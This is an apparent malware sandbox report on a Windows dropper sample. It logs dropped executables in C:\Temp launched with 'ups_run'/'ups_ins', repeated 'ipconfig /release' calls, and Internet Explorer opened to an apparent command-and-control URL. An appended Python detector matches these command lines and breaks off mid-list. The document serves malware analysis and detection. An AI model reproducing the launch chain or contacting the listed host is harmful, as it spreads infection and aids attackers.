Analysis Overview
SHA256
6d131c347e95abc7aedf92773ee5b94593279c62bf02528365544a663bf0826c
Threat Level: Shows suspicious behavior
The file JaffaCakes118_437309d104ca341348f98d56425358fc was found to show suspicious behavior.
Malicious Activity Summary
Executes dropped EXE
Loads dropped DLL
Unsigned PE
System Location Discovery: System Language Discovery
Suspicious use of FindShellTrayWindow
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Suspicious behavior: LoadsDriver
Suspicious use of AdjustPrivilegeToken
Gathers network information
Modifies Internet Explorer settings
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2025-01-27 20:34
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2025-01-27 20:34
Reported
2025-01-27 20:37
Platform
win7-20241010-en
Max time kernel
150s
Max time network
138s
Command Line
Signatures
Executes dropped EXE
Loads dropped DLL
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\rmgeywrljd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\ysnlfdxspk.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\upnhczusmg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\wqojgbvtnl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\ojgbvtnlgaysqkfd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\caupmhfzur.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\olgeysqlid.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\vsnhfzxsmk.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\axsqkfcxup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\lgeysqlidx.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\cxrpkhcwuo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\wupjhbztom.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\nlfaysqkfc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\usmhezxrmj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\dysqlidxvp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\trmgeywqlj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\pkecwupjey.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\wqlidbvqni.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\usmkezwrpj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\ojhbztolge.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "444171956" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{252E1941-DCEE-11EF-8121-F6D98E36DBEF} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = (binary value not preserved in this copy of the report) | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000023d48ee11fb50b40b431f9f144d107fb000000000200000000001066000000010000200000002778afc389a971e62ac9d1793352ec25bba45f86875d5a60268291980440ec52000000000e80000000020000200000007c9293987ed2dbc789a5101332c660cc9283f003b18e359266451779b42f409d200000006b1563f77b3c808b9082ced6487c6cc20dae70a80af71732660ebeb84a78d1e740000000dae63e5b7fdbf2e4496d6a91a5cf28b80a9702f159b8c47697988b2c84ee59f7f77077e98ebe67b38291ce0ed714180cb4673c7a970153549947385bf63dbaab | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = b0af18fdfa70db01 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\SearchScopes | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_pkecwupjey.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_lgeysqlidx.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_cxrpkhcwuo.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_wupjhbztom.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_wqojgbvtnl.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_nlfaysqkfc.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_caupmhfzur.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_rmgeywrljd.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_olgeysqlid.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_vsnhfzxsmk.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_usmhezxrmj.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_ojhbztolge.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_dysqlidxvp.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_axsqkfcxup.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_usmkezwrpj.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_trmgeywqlj.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_wqlidbvqni.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_ysnlfdxspk.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_upnhczusmg.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe
"C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe"
C:\Temp\ojgbvtnlgaysqkfd.exe
C:\Temp\ojgbvtnlgaysqkfd.exe run
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" http://xytets.com:2345/t.asp?os=home
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2176 CREDAT:275457 /prefetch:2
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\pkecwupjey.exe ups_run
C:\Temp\pkecwupjey.exe
C:\Temp\pkecwupjey.exe ups_run
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\i_pkecwupjey.exe ups_ins
C:\Temp\i_pkecwupjey.exe
C:\Temp\i_pkecwupjey.exe ups_ins
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\lgeysqlidx.exe ups_run
C:\Temp\lgeysqlidx.exe
C:\Temp\lgeysqlidx.exe ups_run
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\i_lgeysqlidx.exe ups_ins
C:\Temp\i_lgeysqlidx.exe
C:\Temp\i_lgeysqlidx.exe ups_ins
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\cxrpkhcwuo.exe ups_run
C:\Temp\cxrpkhcwuo.exe
C:\Temp\cxrpkhcwuo.exe ups_run
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\i_cxrpkhcwuo.exe ups_ins
C:\Temp\i_cxrpkhcwuo.exe
C:\Temp\i_cxrpkhcwuo.exe ups_ins
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\wupjhbztom.exe ups_run
C:\Temp\wupjhbztom.exe
C:\Temp\wupjhbztom.exe ups_run
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\i_wupjhbztom.exe ups_ins
C:\Temp\i_wupjhbztom.exe
C:\Temp\i_wupjhbztom.exe ups_ins
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\wqojgbvtnl.exe ups_run
C:\Temp\wqojgbvtnl.exe
C:\Temp\wqojgbvtnl.exe ups_run
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\i_wqojgbvtnl.exe ups_ins
C:\Temp\i_wqojgbvtnl.exe
C:\Temp\i_wqojgbvtnl.exe ups_ins
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\nlfaysqkfc.exe ups_run
C:\Temp\nlfaysqkfc.exe
C:\Temp\nlfaysqkfc.exe ups_run
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\i_nlfaysqkfc.exe ups_ins
C:\Temp\i_nlfaysqkfc.exe
C:\Temp\i_nlfaysqkfc.exe ups_ins
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\caupmhfzur.exe ups_run
C:\Temp\caupmhfzur.exe
C:\Temp\caupmhfzur.exe ups_run
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\i_caupmhfzur.exe ups_ins
C:\Temp\i_caupmhfzur.exe
C:\Temp\i_caupmhfzur.exe ups_ins
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\rmgeywrljd.exe ups_run
C:\Temp\rmgeywrljd.exe
C:\Temp\rmgeywrljd.exe ups_run
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\i_rmgeywrljd.exe ups_ins
C:\Temp\i_rmgeywrljd.exe
C:\Temp\i_rmgeywrljd.exe ups_ins
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\olgeysqlid.exe ups_run
C:\Temp\olgeysqlid.exe
C:\Temp\olgeysqlid.exe ups_run
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\i_olgeysqlid.exe ups_ins
C:\Temp\i_olgeysqlid.exe
C:\Temp\i_olgeysqlid.exe ups_ins
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\vsnhfzxsmk.exe ups_run
C:\Temp\vsnhfzxsmk.exe
C:\Temp\vsnhfzxsmk.exe ups_run
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\i_vsnhfzxsmk.exe ups_ins
C:\Temp\i_vsnhfzxsmk.exe
C:\Temp\i_vsnhfzxsmk.exe ups_ins
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\usmhezxrmj.exe ups_run
C:\Temp\usmhezxrmj.exe
C:\Temp\usmhezxrmj.exe ups_run
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\i_usmhezxrmj.exe ups_ins
C:\Temp\i_usmhezxrmj.exe
C:\Temp\i_usmhezxrmj.exe ups_ins
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\ojhbztolge.exe ups_run
C:\Temp\ojhbztolge.exe
C:\Temp\ojhbztolge.exe ups_run
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\i_ojhbztolge.exe ups_ins
C:\Temp\i_ojhbztolge.exe
C:\Temp\i_ojhbztolge.exe ups_ins
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\dysqlidxvp.exe ups_run
C:\Temp\dysqlidxvp.exe
C:\Temp\dysqlidxvp.exe ups_run
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\i_dysqlidxvp.exe ups_ins
C:\Temp\i_dysqlidxvp.exe
C:\Temp\i_dysqlidxvp.exe ups_ins
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\axsqkfcxup.exe ups_run
C:\Temp\axsqkfcxup.exe
C:\Temp\axsqkfcxup.exe ups_run
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\i_axsqkfcxup.exe ups_ins
C:\Temp\i_axsqkfcxup.exe
C:\Temp\i_axsqkfcxup.exe ups_ins
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\usmkezwrpj.exe ups_run
C:\Temp\usmkezwrpj.exe
C:\Temp\usmkezwrpj.exe ups_run
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\i_usmkezwrpj.exe ups_ins
C:\Temp\i_usmkezwrpj.exe
C:\Temp\i_usmkezwrpj.exe ups_ins
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\trmgeywqlj.exe ups_run
C:\Temp\trmgeywqlj.exe
C:\Temp\trmgeywqlj.exe ups_run
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\i_trmgeywqlj.exe ups_ins
C:\Temp\i_trmgeywqlj.exe
C:\Temp\i_trmgeywqlj.exe ups_ins
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\wqlidbvqni.exe ups_run
C:\Temp\wqlidbvqni.exe
C:\Temp\wqlidbvqni.exe ups_run
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\i_wqlidbvqni.exe ups_ins
C:\Temp\i_wqlidbvqni.exe
C:\Temp\i_wqlidbvqni.exe ups_ins
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\ysnlfdxspk.exe ups_run
C:\Temp\ysnlfdxspk.exe
C:\Temp\ysnlfdxspk.exe ups_run
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\i_ysnlfdxspk.exe ups_ins
C:\Temp\i_ysnlfdxspk.exe
C:\Temp\i_ysnlfdxspk.exe ups_ins
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\upnhczusmg.exe ups_run
C:\Temp\upnhczusmg.exe
C:\Temp\upnhczusmg.exe ups_run
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\i_upnhczusmg.exe ups_ins
C:\Temp\i_upnhczusmg.exe
C:\Temp\i_upnhczusmg.exe ups_ins
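The process list above repeats one pattern: a dropped helper C:\temp\CreateProcess.exe starts a fresh ten-letter C:\Temp\<name>.exe with ups_run, runs ipconfig /release, then starts C:\Temp\i_<name>.exe with ups_ins, and the loop continues with a new name. What follows is an added example, not part of this report and not the sample's own code: a small Python detector that takes process-creation command lines (the shape Sysmon Event ID 1 or EDR telemetry gives you), classifies each one against those shapes, and alerts only when a name is seen at both the run and the install stage. The sample command lines are constructed from the Processes section plus benign noise; the function names, the field layout and the choice of the run+install pair as the alert condition are assumptions of this example.

```python
import re
from collections import defaultdict

# Shapes taken from the Processes section of the report: a 10-letter lowercase
# name, optionally prefixed "i_", dropped into C:\Temp and started with
# "ups_run" (run stage) or "ups_ins" (install stage).
PAYLOAD_RE = re.compile(
    r'^"?(?P<path>(?i:[a-z]:\\temp\\)(?P<ins>i_)?(?P<name>[a-z]{10})\.exe)"?\s+'
    r'(?P<stage>ups_run|ups_ins)\s*$')
# The dropped helper that does the spawning; whatever follows it is the child's
# command line, so it is parsed recursively.
LAUNCHER_RE = re.compile(
    r'^"?[a-z]:\\temp\\createprocess\.exe"?\s+(?P<child>.+?)\s*$', re.IGNORECASE)
# Low-fidelity on its own; it matters here because the same launcher runs it
# in lockstep with every payload.
IPCONFIG_RELEASE_RE = re.compile(r'(^|\\)ipconfig(\.exe)?"?\s+/release\s*$', re.IGNORECASE)
# The first-stage payload hands a URL to Internet Explorer; keep it as an IOC.
IE_URL_RE = re.compile(r'iexplore\.exe"?\s+(?P<url>https?://\S+)', re.IGNORECASE)

# Constructed sample input (not real telemetry): command lines copied from the
# report's Processes section plus benign noise that must not match.
SAMPLE_CMDLINES = [
    r'"C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe"',
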